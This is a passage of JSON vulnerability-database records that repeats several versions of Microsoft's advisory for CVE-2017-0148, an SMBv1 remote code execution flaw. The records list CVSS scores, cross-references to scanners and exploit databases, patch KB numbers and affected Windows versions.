"RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-21T10:46:37", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-21T10:46:37", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012213", "KB4012598", "KB4012215", "KB4012212", "KB4012214", "KB3205401", "KB4013198", "KBMS16-110, 3187754", "KB4012216", "KB3177186", "KB4012606", "KB3210721", "KB4012217", "KB3205409", "KB3210720", "KB4013429", "KB3212646", "KB3213986"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-25T23:09:38", "differentElements": ["msAffectedSoftware"], "edition": 76}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-26T00:46:05", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-26T00:46:05", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-26T00:46:05", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KBMS16-110, 3187754", "KB3210720", "KB4012217", "KB3177186", "KB3213986", "KB4012216", "KB3205409", "KB4012213", "KB4012214", "KB3205401", "KB4012212", "KB4012606", "KB4012598", "KB3210721", "KB4012215", "KB3212646", "KB4013198"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-26T00:46:05", "differentElements": ["msAffectedSoftware"], "edition": 77}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-28T08:53:53", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-28T08:53:53", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-28T08:53:53", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3210720", "KBMS16-110, 3187754", "KB4012215", "KB4012212", "KB4012216", "KB3212646", "KB3205409", "KB3213986", "KB3177186", "KB4012598", "KB4012217", "KB4012606", "KB3210721", "KB4012214", "KB4013198", "KB4012213", "KB3205401", "KB4013429"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", 